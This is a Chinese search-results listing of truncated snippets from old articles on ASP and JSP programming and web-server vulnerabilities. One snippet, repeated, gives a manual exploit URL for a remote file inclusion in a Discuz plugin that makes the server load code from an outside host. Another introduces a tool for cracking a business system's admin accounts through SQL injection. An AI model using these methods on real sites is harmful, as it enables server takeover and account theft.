搜索列表
-
解决ASP(图像)上传漏洞的方法
【ASP编程】经常听说的ASP上传漏洞,即是将一些木马文件修改后缀名(修改为图像文件后缀),进行上传。 针对此情况使用下列函数进行辨别:复制代码 代码如下:<% '****************************************************************** 'CheckFileType 函数用来检查文件是否为图片文件 '参数filename是本地文件的路径 '如...
解决ASP(图像)上传漏洞的方法 -
discuz许愿池插件远程包含漏洞
【安全相关】许愿池插件的wish.php文件出的问题: require $discuz_root.'./include/discuzcode.func.php'; 手工利用方法: 远程包含漏洞,变量discuz_root过滤不严,利用方法: http://url/wish.php?discuz_root=http://www.neeao.com/xxxx.txt? 不一定非要txt后缀,可以改为任意后缀,后面一定要记得加问号。 这里xxxx.txt用C...
discuz许愿池插件远程包含漏洞 -
discuz许愿池插件远程包含漏洞
【安全相关】许愿池插件的wish.php文件出的问题: require $discuz_root.'./include/discuzcode.func.php'; 手工利用方法: 远程包含漏洞,变量discuz_root过滤不严,利用方法: http://url/wish.php?discuz_root=http://www.neeao.com/xxxx.txt? 不一定非要txt后缀,可以改为任意后缀,后面一定要记得加问号。 这里xxxx.txt用C...
discuz许愿池插件远程包含漏洞 -
奇妙的文件系统对象组件
【ASP编程】翻译 讨饭猫 很久以前(其实就几个月)就知道 Chinaasp 有个实际效果象黑客的ASE程序,最近 Chinaasp 又提供了精华区全文检索功能。看来文件系统对象组件还是很有用的,对吧?如果你对此有兴趣,可以看看这篇文章。本文属入门级,修行还靠你自己,呵呵。 注意:我们在下文中要操作的是Web服务器的文件系统,所以首先要确定...
|奇妙|妙的|的文|文件|件系|系统|统对|对象|象组|组件|件| -
天意商务系统后台管理帐号破解html版
【安全相关】 /** 慈勤强 http://blog.csdn.net/cqq */ 自从上次写了个天意商务系统破解程序之后, 收到了不少朋友的来信, 有询问程序原理的,有询问如何防护的。 今天,我抽了一点时间,做了这个Html版,就只有这一个htm文件 相信有点html知识和SQL Injection知识的朋友都能够看懂 原理非常简单,破解用户帐号是用的S...
天意商务系统后台管理帐号破解html版 -
IBM HTTP Server 远程溢出漏洞
【JSP编程】涉及程序: GET 描述: 通过提交超长的GET请求导致IBM HTTP Server远程溢出详细: IBM 的 HTTP 服务器是一个 web 服务器。在 Windows NT 使用的版本中存在拒绝服务的漏洞。如果提交一个超过219个字符的 GET 请求,将导致服务器停止响应,并报错。要恢复服务正常工作需要重新启动应用程序。成功的利用...
|IB|BM|MH|HT|TT|TP|PS|Se|er|rv|ve|er|r远|远程|程溢|溢出|出漏|漏洞|洞| -
IBM WebSphere源代码暴露漏洞
【JSP编程】bugtraq id 1500 class Access Validation Error cve GENERIC-MAP-NOMATCH remote Yes local Yes published July 24, 2000 updated July 24, 2000 vulnerable IBM Websphere Application Server 3.0.21- Sun Solaris 8.0- Microsoft Windows NT 4.0- Linux kernel 2.3.x- IBM AIX 4.3...
|IB|BM|MW|We|eb|bS|Sp|ph|he|er|re|e源|源代|代码|码暴|暴露|露漏|漏洞|洞| -
JSP简明教程
【JSP编程】一、 什么是JSP JSP(JavaServer Pages)是由Sun Microsystems公司倡导、许多公司参与一起建立的一种动态网页技术标准,其网址为http://www.javasoft.com/products/jsp。在传统的网页HTML文件(*.htm,*.html)中加入Java程序片段(Scriptlet)和JSP标记(tag),就构成了JSP网页(*.jsp)。Web服务器在遇到...
|JS|SP|P简|简明|明教|教程|程| -
JSP多种web应用服务器导致JSP源码泄漏漏洞
【JSP编程】JSP多种web应用服务器导致JSP源码泄漏漏洞 作者:中联绿盟 汉化:不详 整理:JSPER 受影响的系统: BEA Systems Weblogic 4.5.1 - Microsoft Windows NT 4.0 BEA Systems Weblogic 4.0.4 - Microsoft Windows NT 4.0 BEA Systems Weblogic 3.1.8 - Microsoft Windows NT 4.0 IBM...
|JS|SP|P多|多种|种w|we|eb|b应|应用|用服|服务|务器|器导|导致|致J|JS|SP|P源|源码|码泄|泄漏|漏漏|漏洞|洞| -
JSP漏洞大观
【JSP编程】综述:服务器漏洞是安全问题的起源,黑客对网站的攻击也大多是从查找对方的漏洞开始的。所以只有了解自身的漏洞,网站管理人员才能采取相应的对策,阻止外来的攻击。下面介绍一下一些服务器(包括Web服务器和JSP服务器)的常见漏洞。 Apache泄露重写的任意文件漏洞是怎么回事? 在Apache1.2以及以后的版本中存在一...
|JS|SP|P漏|漏洞|洞大|大观|观| -
JSP安全性初探
【JSP编程】综述:有几种办法可以暴露JSP代码,不过经过大量测试,这和WEB SERVER的配置有绝对的关系,就拿IBM Websphere Commerce Suite而言,还有别的方法看到JSP源代码,但相信是IBM HTTP SERVER的配置造成的。 如果想发现JSP暴露源代码的BUG的话,首先需要了解JSP的工作原理。 JSP...
|JS|SP|P安|安全|全性|性初|初探|探| -
JSP应用的安全问题
【JSP编程】一、概述 当网络编程越来越方便,系统功能越来越强大,安全性却指数倍地下降。这恐怕就是网络编程的不幸和悲哀了。各种动态内容生成环境繁荣了WWW,它们的设计目标就是为了给开发者更多的力量,给最终用户更多的方便。正因为如此,系统设计师和开发者必须明确地把安全问题作为一个考虑因素,事后追悔很难奏效。...
|JS|SP|P应|应用|用的|的安|安全|全问|问题|题|
